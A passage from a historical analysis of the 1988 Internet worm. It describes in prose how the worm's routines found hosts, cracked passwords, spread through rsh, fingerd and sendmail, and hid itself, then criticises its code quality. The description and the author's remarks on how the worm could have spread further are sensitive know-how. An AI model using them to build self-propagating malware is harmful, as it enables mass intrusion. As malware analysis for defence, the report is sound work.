  682. would call if_init. If no interfaces were discovered by that
  683. routine, the program would call exit. The program would then get
  684. its current process group. If the process group was the same as
  685. its parent process id \(passed on the command line\), it would
  686. reset its process group and send a KILL signal to its parent.
  687. Last of all, the routine doit was invoked.
  688. 5.2.2. doit
  689. This was the main worm code. First, a variable was set to the
  690. current time with a call to time, and the random number generator
  691. was initialized with the return value. Next, the routines hg and
  692. hl were invoked to infect some hosts. If one or both of these
  693. failed to infect any hosts, the routine ha was invoked. Next, the
  694. routine checkother was called to see if other worms were on this
  695. host. The routine send_message was also called to cast suspicion
  696. on the folks at Berkeley.
  697. 12
  698. The code then entered an infinite loop: A call would be made to
  699. cracksome followed by a call to other_sleep with a parameter of
  700. 30. Then cracksome would be called again. At this point, the
  701. process would fork itself, and the parent would exit, leaving the
  702. child to continue. Next, the routines hg, ha, and hi would all be
  703. called to infect other hosts. If any one \(or combination\) of
  704. these routines failed to infect a new host, the routine hl would
  705. be called to infect a local host. Thus, the code was aggressive
  706. about always infecting at least one host each pass through this
  707. loop. The logic here was faulty, however, because if all known
  708. gateway hosts were infected, or a bad set of host numbers were
  709. tried in ha, this code would call hl every time through the loop.
  710. Such behavior was one of the reasons hosts became overloaded with
  711. worm processes: every pass through the loop, each worm would
  712. likely be forced to infect another local host. Considering that
  713. multiple worms could run on a host for some time before one would
  714. exit, this could lead to an exponential growth of worms in a LAN
  715. environment. Next, the routine other_sleep was called with a
  716. timeout of 120. A check was then made to see if the worm had run
  717. for more than 12 hours. If so, a call was made to h_clean.
  718. Finally, a check was made of the pleasequit and nextw variables
  719. \(set in other_sleep or checkother, and crack_2, respectively\).
  720. If pleasequit was nonzero, and nextw was greater than 10, the
  721. worm would exit.
  722. 5.2.3. attack_network
  723. This routine was designed to infect random hosts on a subnet.
  724. First, for each of the network interfaces, if checked to see if
  725. the target host was on a network to which the current host was
  726. directly connected. If so, the routine immediately returned.
  727. 13
  728. Based on the class of the netmask \(e.g., Class A, Class B\), the
  729. code constructed a list of likely network numbers. A special
  730. algorithm was used to make good guesses at potential Class A host
  731. numbers. All these constructed host numbers were placed in a
  732. list, and the list was then randomized using permute. If the
  733. network was Class B, the permutation was done to favor low-
  734. numbered hosts by doing two separate permutations\320the first
  735. six hosts in the output list were guaranteed to be chosen from
  736. the first dozen \(low-numbered\) host numbers generated. The
  737. first 20 entries in the permuted list were the only ones
  738. examined. For each such IP address, its entry was retrieved from
  739. the global list of hosts \(if it was in the list\). If the host
  740. was in the list and was marked as already infected or immune, it
  741. was ignored. Otherwise, a check was made to see if the host
  742. supported the rsh command \(identifying it as existing and having
  743. BSD-derived networking services\) by calling supports_rsh. If the
  744. host did support rsh, it was entered into the hosts list if not
  745. already present, and a call to infect was made for that host. If
  746. a successful infection occurred, the routine returned early with
  747. a value of TRUE \(1\).
  748. 5.2.4. attack_user
  749. This routine was called after a user password was broken. It has
  750. some incorrect code and may not work properly on every
  751. architecture because a subroutine call was missing an argument.
  752. However, on Suns and VAXen, the code will work because the
  753. missing argument was supplied as an extra argument to the
  754. previous call, and the order of the arguments on the stack
  755. matches between the two routines. It was largely a coincidence
  756. that this worked. The routine attempted to open a .forward file
  757. in the the user's home directory, and then for each host and user
  758. name present in that file, it called the hul routine. It then did
  759. the same thing with the .rhosts file, if present, in the user's
  760. home directory.
  761. 5.2.5. checkother
  762. This routine was to see if another worm was present on this
  763. machine and is a companion routine to other_sleep. First, a
  764. random value was checked: with a probability of 1 in 7, the
  765. routine returned without ever doing anything\320these worms
  766. become immortal in the sense that they never again participated
  767. in the process of thinning out multiple local worms. Otherwise,
  768. the worm created a socket and tried to connect to the local
  769. ``worm port''\320 23357. If the connection was successful, an
  770. exchange of challenges was made to verify that the other side was
  771. actually a fellow worm. If so, a random value was written to the
  772. other side, and a value was read from the socket. If the sum of
  773. the value sent plus the value read was even, the local worm set
  774. its pleasequit variable to 1, thus marking it for eventual self-
  775. destruction. The socket was then closed, and the worm opened a
  776. new socket on the same port \(if it was not destined to self-
  777. destruct\) and set other_fd to that socket to listen for other
  778. worms. If any errors were encountered during this procedure, the
  779. worm involved set other_fd to -1 and it returned from the
  780. routine. This meant that any error caused the worm to be
  781. immortal, too.
  782. 5.2.6. crack_0
  783. This routine first scanned the /etc/hosts.equiv file, adding new
  784. hosts to the global list of hosts and setting the \257ags field
  785. to mark them as equivalent. Calls were made to name2host and
  786. getaddrs. Next, a similar scan was made of the /.rhosts file
  787. using the exact same calls. The code then called setpwent to open
  788. the /etc/passwd file. A loop was performed as long as passwords
  789. could be read: Every 10th entry, a call was made to other_sleep
  790. with a timeout of 0. For each user, an attempt was made to open
  791. the file .forward
  792. 14
  793. in the home directory of that user, and read the hostnames
  794. therein. These hostnames were also added to the host list and
  795. marked as equivalent. The encrypted password, home directory, and
  796. gecos field for each user was stored into the pwd structure.
  797. After all user entries were read, the endpwent routine was
  798. invoked, and the cmode variable was set to 1.
  799. 5.2.7. crack_1
  800. This routine tried to break passwords. It looped until all
  801. accounts had been tried, or until the next group of 50 accounts
  802. had been tested. In the loop: A call was made to other_sleep with
  803. a parameter of zero each time the loop index modulo 10 was zero
  804. \(i.e., every 10 calls\). Repeated calls were made to
  805. try_password with the values discussed earlier in \2474-8b. Once
  806. all accounts had been tried, the variable cmode was set to 2.
  807. 5.2.8. crack_2
  808. This routine used the mini-dictionary in an attempt to break user
  809. passwords \(see Appendix A\). The dictionary was first permuted
  810. \(using the permute\) call. Each word was decrypted in- place by
  811. XORing its bytes with 0x80. The decrypted word was then passed to
  812. the try_password routine for each user account. The word was then
  813. re-encrypted. A global index, named nextw was incremented to
  814. point to the next dictionary entry. The nextw index is also used
  815. in doit to determine if enough effort had been expended so that
  816. the worm could ``...go gently into that good night.'' When no
  817. more words were left, the variable cmode was set to 3. There are
  818. two interesting points to note in this routine: the reverse of
  819. these words were not tried, although that would seem like a
  820. logical thing to do, and all words were encrypted and decrypted
  821. in place rather than in a temporary buffer. This is less
  822. efficient than a copy while masking since no re-encryption ever
  823. needs to be done. As discussed in the next section, many examples
  824. of unnecessary effort such as this were present in the program.
  825. Furthermore, the entire mini-dictionary was decrypted all at once
  826. rather than a word at a time. This would seem to lessen the
  827. benefit of encrypting those words at all, since the entire
  828. dictionary would then be present in memory as plaintext during
  829. the time all the words were tried.
  830. 5.2.9. crack_3
  831. This was the last password cracking routine. It opened
  832. /usr/dict/words, and for each word found it called try_password
  833. against each account. If the first letter of the word was a
  834. capital, it was converted to lower case and retried. After all
  835. words were tried, the variable cmode was incremented and the
  836. routine returned. In this routine, no calls to other_sleep were
  837. interspersed, thus leading to processes that ran for a long time
  838. before checking for other worms on the local machine. Also of
  839. note, this routine did not try the reverse of words either!
  840. 5.2.10. cracksome
  841. This routine was a simple switch statement on an external
  842. variable named cmode and it implemented the five strategies
  843. discussed in \2474-8 of this paper. State zero called crack_0,
  844. state one called crack_1, state two called crack_2, and state
  845. three called crack_3. The default case simply returned.
  846. 5.2.11. crypt
  847. This routine took a key and a salt, then performed the UNIX
  848. password encryption function on a block of zero bits. The return
  849. value of the routine was a pointer to a character string of 13
  850. characters representing the encoded password. The routine was
  851. highly optimized and differs considerably from the standard
  852. library version of the same routine. It called the following
  853. routines: compkeys, mungE, des, and ipi. A routine, setupE, was
  854. also present and was associated with this code, but it was never
  855. referenced. It appears to duplicate the functionality of the
  856. mungE function.
  857. 5.2.12. h_addaddr
  858. This routine added alternate addresses to a host entry in the
  859. global list if they were not already present.
  860. 5.2.13. h_addname
  861. This routine added host aliases \(names\) to a given host entry.
  862. Duplicate entries were suppressed.
  863. 5.2.14. h_addr2host
  864. The host address provided to the routine was checked against each
  865. entry in the global host list to see if it was already present.
  866. If so, a pointer to that host entry was returned. If not, and if
  867. a parameter flag was set, a new entry was initialized with the
  868. argument address and a pointer to it was returned.
  869. 5.2.15. h_clean
  870. This routine traversed the host list and removed any entries
  871. marked as infected or immune \(leaving hosts not yet tried\).
  872. 5.2.16. h_name2host
  873. Just like h_addr2host except the comparison was done by name with
  874. all aliases.
  875. 5.2.17. ha
  876. This routine tried to infect hosts on remote networks. First, it
  877. checked to see if the gateways list had entries; if not, it
  878. called rt_init. Next, it constructed a list of all IP addresses
  879. for gateway hosts that responded to the try_telnet routine. The
  880. list of host addresses was randomized by permute. Then, for each
  881. address in the list so constructed, the address was masked with
  882. the value returned by netmaskfor and the result was passed to the
  883. attack_network routine. If an attack was successful, the routine
  884. exited early with a return value of TRUE.
  885. 5.2.18. hg
  886. This routine attempted to infect gateway machines. It first
  887. called rt_init to reinitialize the list of gateways, and then for
  888. each gateway it called the main infection routine, infect, with
  889. the gateway as an argument. As soon as one gateway was
  890. successfully infected, the routine returned TRUE.
  891. 5.2.19. hi
  892. This routine tried to infect hosts whose entries in the hosts
  893. list were marked as equivalent. The routine traversed the global
  894. host list looking for such entries and then calling infect with
  895. those hosts. A successful infection returned early with the value
  896. TRUE.
  897. 5.2.20. hl
  898. This routine was intended to attack hosts on directly-connected
  899. networks. For each alternate address of the current host, the
  900. routine attack_network was called with an argument consisting of
  901. the address logically and-ed with the value of netmask for that
  902. address. A success caused the routine to return early with a
  903. return value of TRUE.
  904. 5.2.21. hul
  905. This function attempted to attack a remote host via a particular
  906. user. It first checked to make sure that the host was not the
  907. current host and that it had not already been marked as infected.
  908. Next, it called getaddrs to be sure there was an address to be
  909. used. It examined the username for punctuation characters, and
  910. returned if any were found. It then called other_sleep with an
  911. argument of 1. Next, the code tried the attacks described in
  912. \2474-10. Calls were made to sendworm if either attack succeeded
  913. in establishing a shell on the remote machine.
  914. 5.2.22. if_init
  915. This routine constructed the list of interfaces using ioctl
  916. calls. In summary, it obtained information about each interface
  917. that was up and running, including the destination address in
  918. point-to-point links, and any netmask for that interface. It
  919. initialized the me pointer to the first non-loopback address
  920. found, and it entered all alternate addresses in the address
  921. list.
  922. 5.2.23. infect
  923. This was the main infection routine. First, the host argument was
  924. checked to make sure that it was not the current host, that it
  925. was not currently infected, and that it had not been determined
  926. to be immune. Next, a check was made to be sure that an address
  927. for the host could be found by calling getaddrs. If no address
  928. was found, the host was marked as immune and the routine returned
  929. FALSE. Next, the routine called other_sleep with a timeout of 1.
  930. Following that, it tried, in succession, calls to try_rsh,
  931. try_fingerd, and try_sendmail. If the calls to try_rsh or
  932. try_fingerd
  933. succeeded, the file descriptors established by those invocations
  934. were passed as arguments to the sendworm call. If any of the
  935. three infection attempts succeeded, infect returned early with a
  936. value of TRUE. Otherwise, the routine returned FALSE.
  937. 5.2.24. loadobject
  938. This routine read an object file into the objects structure in
  939. memory. The file was opened and the size found with a call to the
  940. library routine fstat. A buffer was malloc'd of the appropriate
  941. size, and a call to read was made to read the contents of the
  942. file. The buffer was encrypted with a call to xorbuf, then
  943. transferred into the objects array. The suffix of the name
  944. \(e.g., sun3.o, l1.c, vax.o\) was saved in a field in the
  945. structure, as was the size of the object.
  946. 5.2.25. makemagic
  947. The routine used the library random call to generate a random
  948. number for use as a challenge number. Next, it tried to connect
  949. to the telnet port \(#23\) of the target host, using each
  950. alternate address currently known for that host. If a successful
  951. connection was made, the library call getsockname was called to
  952. get the canonical IP address of the current host relative to the
  953. target. Next, up to 1024 attempts were made to establish a TCP
  954. socket, using port numbers generated by taking the output of the
  955. random number generator modulo 32767. If the connection was
  956. successful, the routine returned the port number, the file
  957. descriptor of the socket, the canonical IP address of the current
  958. host, and the challenge number.
  959. 5.2.26. netmaskfor
  960. This routine stepped through the interfaces array and checked the
  961. given address against those interfaces. If it found that the
  962. address was reachable through a connected interface, the netmask
  963. returned was the netmask associated with that interface.
  964. Otherwise, the return was the default netmask based on network
  965. type \(Class A, Class B, Class C\).
  966. 5.2.27. other_sleep
  967. This routine checked a global variable named other_fd. If the
  968. variable was less than zero, the routine simply called sleep with
  969. the provided timeout argument, then returned. Otherwise, the
  970. routine waited on a select system call for up to the value of the
  971. timeout. If the timeout expired, the routine returned. Otherwise,
  972. if the select return code indicated there was input pending on
  973. the other_fd descriptor, it meant there was another worm on the
  974. current machine. A connection was established and an exchange of
  975. ``magic'' numbers was made to verify identity. The local worm
  976. then wrote a random number \(produced by random\) to the other
  977. worm via the socket. The reply was read and a check was made to
  978. ensure that the response came from the localhost \(127.0.0.1\).
  979. The file descriptor was closed. If the random value sent plus the
  980. response was an odd number, the other_fd variable was set to -1
  981. and the pleasequit variable was set to 1. This meant that the
  982. local worm would die when conditions were right \(cf. doit \),
  983. and that it would no longer attempt to contact other worms on the
  984. local machine. If the sum was even, the other worm was destined
  985. to die.
  986. 5.2.28. permute
  987. This routine randomized the order of a list of objects. This was
  988. done by executing a loop once for each item in the list. In each
  989. iteration of the loop, the random number generator was called
  990. modulo the number of items in the list. The item in the list
  991. indexed by that value was swapped with the item in the list
  992. indexed by the current loop value \(via a call to bcopy\).
  993. 5.2.29. rt_init
  994. This initialized the list of gateways. It started by setting an
  995. external counter, ngateways, to zero. Next, it invoked the
  996. command ``/usr/ucb/netstat -r -n'' using a popen call. The code
  997. then looped while output was received from the netstat command: A
  998. line was read. A call to other_sleep was made with a timeout of
  999. zero. The input line was parsed into a destination and a gateway.
  1000. If the gateway was not a valid IP address, or if it was the
  1001. loopback address \(127.0.0.1\), it was discarded. The value was
  1002. then compared against all the gateway addresses already known;
  1003. duplicates were skipped. It was also compared against the list of
  1004. local interfaces \(local networks\), and discarded if a
  1005. duplicate. Otherwise, it was added to the list of gateways and
  1006. the counter incremented.
  1007. 5.2.30. scan_gateways
  1008. First, the code called permute to randomize the gateways list.
  1009. Next, it looped over each gateway or the first 20, whichever was
  1010. less: A call was made to other_sleep with a timeout of zero. The
  1011. gateway IP address was searched for in the host list; a new entry
  1012. was allocated for the host if none currently existed. The gateway
  1013. flag was set in the flags field of the host entry. A call was
  1014. made to the library routine gethostbyaddr with the IP number of
  1015. the gateway. The name, aliases and address fields were added to
  1016. the host list, if not already present. Then a call was made to
  1017. gethostbyname and alternate addresses were added to the host
  1018. list. After this loop was executed, a second loop was started
  1019. that did effectively the same thing as the first! There is no
  1020. clear reason why this was done, unless it is a remnant of earlier
  1021. code, or a stub for future additions.
  1022. 5.2.31. send_message
  1023. This routine made a call to random and 14 out of 15 times
  1024. returned without doing anything. In the 15th case, it opened a
  1025. stream socket to host ``ernie.berkeley.edu'' and then tried to
  1026. send an uninitialized byte using the sendto call. This would not
  1027. work \(using a UDP send on a TCP socket\).
  1028. 5.2.32. sendworm
  1029. This routine sent the worm code over a connected TCP circuit to a
  1030. remote machine. First it checked to make sure that the objects
  1031. table held a copy of the l1.c code \(see Appendix B\). Next, it
  1032. called makemagic to get a local socket established and to
  1033. generate a challenge string. Then, it encoded and wrote the
  1034. script detailed previously in \2474-2a. Finally, it called
  1035. waithit and returned the result code of that routine. The object
  1036. files shipped across the link were decrypted in memory first by a
  1037. call to xorbuf and then re-encrypted afterwards.
  1038. 5.2.33. supports_rsh
  1039. This routine determined if the target host, specified as an
  1040. argument, supported the BSD- derived rsh protocol. It did this by
  1041. creating a socket and attempting a TCP connection to port 514 on
  1042. the remote machine. A timeout or connect failure caused a return
  1043. of FALSE; otherwise, the socket was closed and the return value
  1044. was TRUE.
  1045. 5.2.34. supports_telnet
  1046. This routine determined if a host was reachable and supported the
  1047. telnet protocol \(i.e., was probably not a router or similar
  1048. ``dumb'' box\). It was similar to supports_rsh in nature. The
  1049. code established a socket, connected to the remote machine on
  1050. port 23, and returned FALSE if an error or timeout occurred;
  1051. otherwise, the socket was closed and TRUE was returned.
  1052. 5.2.35. try_fingerd
  1053. This routine tried to establish a connection to a remote finger
  1054. daemon on the given host by connecting to port 79. If the
  1055. connection succeeded, it sent across an overfull buffer as
  1056. described in \2474-8b and waited to see if the other side became
  1057. a shell. If so, it returned the file descriptors to the caller;
  1058. otherwise, it closed the socket and returned a failure code.
  1059. 5.2.36. try_password
  1060. This routine called crypt with the password attempt and compared
  1061. the result against the encrypted password in the pwd entry for
  1062. the current user. If a match was found, the unencrypted password
  1063. was copied into the pwd structure, and the routine attack_user
  1064. was invoked.
  1065. 5.2.37. try_rsh
  1066. This function created two pipes and then forked a child process.
  1067. The child process attempted to rexec a remote shell on the host
  1068. specified in the parameters, using the specified username and
  1069. password. Then the child process tried to invoke the rsh command
  1070. by attempting to run, in order, ``/usr/ucb/rsh,''
  1071. ``/usr/bin/rsh,'' and ``/bin/rsh.'' If the remote shell
  1072. succeeded, the function returned the file descriptors of the open
  1073. pipe. Otherwise, it closed all file descriptors, killed the child
  1074. with a SIGKILL, and reaped it with a call to wait3.
  1075. 5.2.38. try_sendmail
  1076. This routine attempted to establish a connection to the SMTP port
  1077. \(#25\) on the remote host. If successful, it conducted the
  1078. dialog explained in \2474-2b. It then called the waithit routine
  1079. to see if the infection ``took.'' Return codes were checked after
  1080. each line was transmitted, and if a return code indicated a
  1081. problem, the routine aborted after sending a ``quit'' message.
  1082. 5.2.39. waithit
  1083. This function acted as the bootstrap server for a vector program
  1084. on a remote machine. It waited for up to 120 seconds on the
  1085. socket created by the makemagic routine, and if no connection was
  1086. made it closed the socket and returned a failure code. Likewise,
  1087. if the first thing received was not the challenge string shipped
  1088. with the bootstrap program, the socket was closed and the routine
  1089. returned. The routine decrypted each object file using xorbuf and
  1090. sent it across the connection to the vector program \(see
  1091. Appendix B\). Then a script was transmitted to compile and run
  1092. the vector. This was described in \2474-4. If the remote host was
  1093. successfully infected, the infected flag was set in the host
  1094. entry and the socket closed. Otherwise, the routine sent rm
  1095. command strings to delete each object file. The function returned
  1096. the success or failure of the infection.
  1097. 5.2.40. xorbuf
  1098. This routine was somewhat peculiar. It performed a simple
  1099. encryption/decryption function by XORing the buffer passed as an
  1100. argument with the first 10 bytes of the xorbuf routine itself!
  1101. This code would not work on a machine with a split I/D space or
  1102. on tagged architectures.
  1103. 6. Analysis of the Code
  1104. 6.1. Structure and Style
  1105. An examination of the reverse-engineered code of the worm is
  1106. instructive. Although it is not the same as reading the original
  1107. code, it does reveal some characteristics of the author\(s\). One
  1108. conclusion that may surprise some people is that the quality of
  1109. the code is mediocre, and might even be considered poor. For
  1110. instance, there are places where calls are made to functions with
  1111. either too many or too few arguments. Many routines have local
  1112. variables that are either never used, or are potentially used
  1113. before they are initialized. In at least one location, a struct
  1114. is passed as an argument rather than the address of the struct.
  1115. There is also dead code, as routines that are never referenced,
  1116. and as code that cannot be executed because of conditions that
  1117. are never met \(possibly bugs\). It appears that the author\(s\)
  1118. never used the lint utility on the program. At many places in the
  1119. code, there are calls on system routines and the return codes are
  1120. never checked for success. In many places, calls are made to the
  1121. system heap routine, malloc and the result is immediately used
  1122. without any check. Although the program was configured not to
  1123. leave a core file or other evidence if a fatal failure occurred,
  1124. the lack of simple checks on the return codes is indicative of
  1125. sloppiness; it also suggests that the code was written and run
  1126. with minimal or no testing. It is certainly possible that some
  1127. checks were written into the code and elided subject to
  1128. conditional compilation flags. However, there would be little
  1129. reason to remove those checks from the production version of the
  1130. code. The structures chosen for some of the internal data are
  1131. also revealing. Everything was represented as linked lists of
  1132. structures. All searches were done as linear passes through the
  1133. appropriate list. Some of these lists could get quite long and
  1134. doubtless that considerable CPU time was spent by the worm just
  1135. maintaining and searching these lists. A little extra code to
  1136. implement hash buckets or some form of sorted lists would have
  1137. added little overhead to the program, yet made it much more
  1138. efficient \(and thus quicker to infect other hosts and less
  1139. obvious to system watchers\). Linear lists may be easy to code,
  1140. but any experienced programmer or advanced CS student should be
  1141. able to implement a hash table or lists of hash buckets with
  1142. little difficulty. Some effort was duplicated in spots. An
  1143. example of this was in the code that tried to break passwords.
  1144. Even if the password to an account had been found in an earlier
  1145. stage of execution, the worm would encrypt every word in the
  1146. dictionary and attempt a match against it. Similar redundancy can
  1147. be found in the code to construct the lists of hosts to infect.
  1148. There are locations in the code where it appears that the
  1149. author\(s\) meant to execute a particular function but used the
  1150. wrong invocation. The use of the UDP send on a TCP socket is one
  1151. glaring example. Another example is at the beginning of the
  1152. program where the code sends a KILL signal to its parent process.
  1153. The surrounding code gives strong indication that the user
  1154. actually meant to do a killpg instead but used the wrong call.
  1155. The one section of code that appears particularly well-thought-
  1156. out involves the crypt routines used to check passwords. As has
  1157. been noted in [Seel88], this code is nine times faster than the
  1158. standard Berkeley crypt function. Many interesting modifications
  1159. were made to the algorithm, and the routines do not appear to
  1160. have been written by the same author as the rest of the code.
  1161. Additionally, the routines involved have some support for both
  1162. encryption anddecryption\320even though only encryption was
  1163. needed for the worm. This supports the assumption that this
  1164. routine was written by someone other than the author\(s\) of the
  1165. program, and included with this code. It would be interesting to
  1166. discover where this code originated and how it came to be in the
  1167. Worm program. The program could have been much more virulent had
  1168. the author\(s\) been more experienced or less rushed in her/his
  1169. coding. However, it seems likely that this code had been
  1170. developed over a long period of time, so the only conclusion that
  1171. can be drawn is that the author\(s\) was sloppy or careless \(or
  1172. both\), and perhaps that the release of the worm was premature.
  1173. 6.2. Problems of Functionality
  1174. There is little argument that the program was functional. In
  1175. fact, we all wish it had been less capable! However, we are lucky
  1176. in the sense that the program had flaws that prevented it from
  1177. operating to the fullest. For instance, because of an error, the
  1178. code would fail to infect hosts on a local area network even
  1179. though it might identify such hosts. Another example of
  1180. restricted functionality concerns the gathering of hostnames to
  1181. infect. As noted already, the code failed to gather host names
  1182. >From user .rhosts files early on. It also did not attempt to
  1183. collect host names from other user and system files containing
  1184. such names \(e.g., /etc/hosts.lpd\). Many of the operations could
  1185. have been done ``smarter.'' The case of using linear structures
  1186. has already been mentioned. Another example would have been to
  1187. sort user passwords by the salt used. If the same salt was
  1188. present in more than one password, then all those passwords could
  1189. be checked in parallel as a single pass was made through the
  1190. dictionaries. On our machine, 5% of the 200 passwords share the
  1191. same salts, for instance. No special advantage was taken if the
  1192. root password was compromised. Once the root password has been
  1193. broken, it is possible to fork children that set their uid and
  1194. environment variables to match each designated user. These
  1195. processes could then attempt the rsh attack described earlier in
  1196. this report. Instead, root is treated as any other account. It
  1197. has been suggested to me that this treatment of root may have
  1198. been a conscious choice of the worm author\(s\). Without knowing
  1199. the true motivation of the author, this is impossible to decide.
  1200. However, considering the design and intent of the program, I find
  1201. it difficult to believe that such exploitation would have been
  1202. omitted if the author had thought of it. The same attack used on
  1203. the finger daemon could have been extended to the Sun version of
  1204. the program, but was not. The only explanations that come to mind
  1205. why this was not done are that the author lacked the motivation,
  1206. the ability, the time, or the resources to develop a version for
  1207. the Sun. However, at a recent meeting, Professor Rick Rashid of
  1208. Carnegie-Mellon University was heard to claim that Robert T.
  1209. Morris, the alleged author of the worm, had revealed the fingerd
  1210. bug to system administrative staff at CMU well over a year ago.
  1211. 15
  1212. Assuming this report is correct and the worm author is indeed Mr.
  1213. Morris, it is obvious that there was sufficient time to construct
  1214. a Sun version of the code. In fact, I asked three Purdue graduate
  1215. students \(Shawn D. Ostermann, Steve J. Chapin, and Jim N.
  1216. Griffoen to develop a Sun 3 version of the attack, and they did
  1217. so in under three hours. The Worm author certainly must have had
  1218. access to Suns or else he would not have been able to provide Sun
  1219. binaries to accompany the operational worm. Motivation should
  1220. also not be a factor considering everything else present in the
  1221. program. With time and resources available, the only reason I
  1222. cannot immediately rule out is that he lacked the knowledge of
  1223. how to implement a Sun version of the attack. This seemsunlikely,
  1224. but given the inconsistent nature of the rest of the code, it is
  1225. certainly a possibility. However, if this is the case, it raises
  1226. a new question: was the author of the Worm the original author of
  1227. the VAX fingerd attack? Perhaps the most obvious shortcoming of
  1228. the code is the lack of understanding about propagation and load.
  1229. The reason the worm was spotted so quickly and caused so much
  1230. disruption was because it replicated itself exponentially on some
  1231. networks, and because each worm carried no history with it.
  1232. Admittedly, there was a check in place to see if the current
  1233. machine was already infected, but one out of every seven worms
  1234. would never die even if there was an existing infestation.
  1235. Furthermore, worms marked for self-destruction would continue to
  1236. execute up to the point of having made at least one complete pass
  1237. through the password file. Many approaches could have been taken
  1238. by the author\(s\) to slow the growth of the worm or prevent
  1239. reinfestation; little is to be gained from explaining them here,
  1240. but their absence from the worm program is telling. Either the
  1241. author\(s\) did not have any understanding of how the program
  1242. would propagate, or else she/he/they did not care; the existence
  1243. in the Worm of mechanisms to limit growth tends to indicate that
  1244. it was a lack of understanding rather than indifference. Some of
  1245. the algorithms used by the Worm were reasonably clever. One in
  1246. particular is interesting to note: when trying passwords from the
  1247. built-in list, or when trying to break into connected hosts, the
  1248. worm would randomize the list of candidates for trial. Thus, if
  1249. more than one worm were present on the local machine, they would
  1250. be more likely to try candidates in a different order, thus
  1251. maximizing their coverage. This implies, however \(as does the
  1252. action of the pleasequit variable\) that the author\(s\) was not
  1253. overly concerned with the presence of multiple worms on the same
  1254. machine. More to the point, multiple worms were allowed for a
  1255. while in an effort to maximize the spread of the infection. This
  1256. also supports the contention that the author did not understand
  1257. the propagation or load effects of the Worm. The design of the
  1258. vector program, the ``thinning'' protocol, and the use of the
  1259. internal state machine were all clever and non-obvious. The
  1260. overall structure of the program, especially the code associated
  1261. with IP addresses, indicates considerable knowledge of networking
  1262. and the routines available to support it. The knowledge evidenced
  1263. by that code would indicate extensive experience with networking
  1264. facilities. This, coupled with some of the errors in the Worm
  1265. code related to networking, further support the thesis that the
  1266. author was not a careful programmer\320the errors in those parts
  1267. of the code were probably not errors because of ignorance or
  1268. inexperience.
  1269. 6.3. Camouflage
  1270. Great care was taken to prevent the worm program from being
  1271. stopped. This can be seen by the caution with which new files
  1272. were introduced into a machine, including the use of random
  1273. challenges. It can be seen by the fact that every string compiled
  1274. into the worm was encrypted to prevent simple examination. It was
  1275. evidenced by the care with which files associated with the worm
  1276. were deleted from disk at the earliest opportunity, and the
  1277. corresponding contents were encrypted in memory when loaded. It
  1278. was evidenced by the continual forking of the process, and the
  1279. \(faulty\) check for other instances of the worm on the local
  1280. host. The code also evidences precautions against providing
  1281. copies of itself to anyone seeking to stop the worm. It sets its
  1282. resource limits so it cannot dump a core file, and it keeps
  1283. internal data encrypted until used. Luckily, there are other
  1284. methods of obtaining core files and data images, and researchers
  1285. were able to obtain all the information they needed to
  1286. disassemble and reverse-engineer the code. There is no doubt,
  1287. however, that the author\(s\) of the worm intended to make such a
  1288. task as difficult as possible.
  1289. 6.4. Specific Comments
  1290. Some more specific comments are worth making. These are directed
  1291. to particular aspects of the code rather than the program as a
  1292. whole.
  1293. 6.4.1. The sendmail attack
  1294. Many sites tend to experience substantial loads because of heavy
  1295. mail traffic. This is especially true at sites with mailing list
  1296. exploders. Thus, the administrators at those sites have
  1297. configured their mailers to queue incoming mail and process the
  1298. queue periodically. The usual configuration is to set sendmail to
  1299. run the queue every 30 to 90 minutes. The attack through sendmail
  1300. would fail on these machines unless the vector program were
  1301. delivered into a nearly empty queue within 120 seconds of it
  1302. being processed. The reason for this is that the infecting worm
  1303. would only wait on the server socket for two minutes after
  1304. delivering the ``infecting mail.'' Thus, on systems with delayed
  1305. queues, the vector process would not get built in time to
  1306. transfer the main worm program over to the target. The vector
  1307. process would fail in its connection attempt and exit with a
  1308. non-zero status. Additionally, the attack through sendmail
  1309. invoked the vector program without a specific path. That is, the
  1310. program was invoked with ``foo'' instead of ``./foo'' as was done
  1311. with the shell-based attack. As a result, on systems where the
  1312. default path used by sendmail's shell did not contain the current
  1313. directory \(``.''\), the invocation of the code would fail. It
  1314. should be noted that such a failure interrupts the processing of
  1315. subsequent commands \(such as the rm of the files\), and this may
  1316. be why many system administrators discovered copies of the vector
  1317. program source code in their /usr/tmp directories.
  1318. 6.4.2. The machines involved
  1319. As has already been noted, this attack was made only on Sun 3
  1320. machines and VAX machines running BSD UNIX. It has been observed
  1321. in at least one mailing list that had the Sun code been compiled
  1322. with the -mc68010 flag, more Sun machines would have fallen
  1323. victim to the worm. It is a matter of some curiosity why more
  1324. machines were not targeted for this attack. In particular, there
  1325. are many Pyramid, Sequent, Gould, Sun 4, and Sun i386 machines on
  1326. the net.
  1327. 16
  1328. If binary files for those had also been included, the worm could
  1329. have spread much further. As it was, some locations such as Ohio
  1330. State were completely spared the effects of the worm because all
  1331. their ``known'' machines were of a type that the worm could not
  1332. infect. Since the author of the program knew how to break into
  1333. arbitrary UNIX machines, it seems odd that he/she did not attempt
  1334. to compile the program on foreign architectures to include with
  1335. the worm.
  1336. 6.4.3. Portability considerations
  1337. The author\(s\) of the worm may not have had much experience with
  1338. writing portable UNIX code, including shell scripts. Consider
  1339. that in the shell script used to compile the vector, the
  1340. following command is used: if [ -f sh ] The use of the [
  1341. character as a synonym for the test function is not universal.
  1342. UNIX users with experience writing portable shell files tend to
  1343. spell out the operator test rather than rely on therebeing a link
  1344. to a file named ``['' on any particular system. They also know
  1345. that the test operator is built-in to many shells and thus faster
  1346. than the external [ variant. The test invocation used in the worm
  1347. code also uses the -f flag to test for presence of the file named
  1348. sh. This provided us with the worm ``condom'' published Thursday
  1349. night:
  1350. 17
  1351. creating a directory with the name sh in /usr/tmp causes this
  1352. test to fail, as do later attempts to create executable files by
  1353. that name. Experienced shell programmers tend to use the -e
  1354. \(exists\) flag in circumstances such as this, to detect not only
  1355. directories, but sockets, devices, named FIFOs, etc. Other
  1356. colloquialisms are present in the code that bespeak a lack of
  1357. experience writing portable code. One such example is the code
  1358. loop where file units are closed just after the vector program
  1359. starts executing, and again in the main program just after it
  1360. starts executing. In both programs, code such as the following is
  1361. executed: for \(i = 0; i < 32; i++\) close\(i\); The portable way
  1362. to accomplish the task of closing all file descriptors \(on
  1363. Berkeley-derived systems\) is to execute: for \(i = 0; i <
  1364. getdtablesize\(\); i++\) close \(i\); or the even more efficient
  1365. for \(i = getdtablesize\(\)-1; i >= 0; i--\) close\(i\); This is
  1366. because the number of file units available \(and thus open\) may
  1367. vary from system to system.
  1368. 6.5. Summary
  1369. Many other examples can be drawn from the code, but the points
  1370. should be obvious by now: the author of the worm program may have
